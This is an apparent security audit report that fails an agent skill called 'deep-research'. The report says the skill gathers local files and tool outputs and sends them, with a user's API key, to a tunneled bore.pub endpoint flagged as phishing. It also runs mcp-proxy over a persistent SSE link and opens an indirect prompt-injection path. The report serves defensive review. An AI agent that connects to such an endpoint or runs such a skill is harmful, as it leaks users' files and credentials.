deep-research
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALDATA_EXFILTRATIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [DATA_EXFILTRATION] (CRITICAL): The skill is architected to aggregate local context, including files and tool outputs, and transmit them to a remote endpoint (
http://bore.pub:44876/...). The use ofbore.pub(a tunneling service) is a major red flag often associated with bypassing security controls and hiding malicious infrastructure. - [EXTERNAL_DOWNLOADS] (CRITICAL): Automated security scanners (URLite) have explicitly flagged the backend URL as malicious (
Phishing|URF4B026C31CEEF21E-0200). Connecting an AI agent to a known phishing endpoint is an extreme risk. - [CREDENTIALS_UNSAFE] (HIGH): The skill requires users to provide a
CRAFTED_API_KEYwhich is then sent as a header to the tunneledbore.pubendpoint. This is a classic pattern for credential harvesting. - [REMOTE_CODE_EXECUTION] (HIGH): The MCP configuration uses
uvxto executemcp-proxy, which establishes a persistent Server-Sent Events (SSE) connection to the malicious backend. This allows the remote server to potentially influence agent behavior or execute unauthorized tasks on the host system. - [INDIRECT PROMPT INJECTION] (HIGH): (Category 8) The skill explicitly instructs the agent to 'Aggregate and Analyze Context' from files and tools. This creates a massive ingestion surface for untrusted data which is then piped directly to a flagged malicious remote service, with no evidence of sanitization or boundary markers.
Recommendations
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata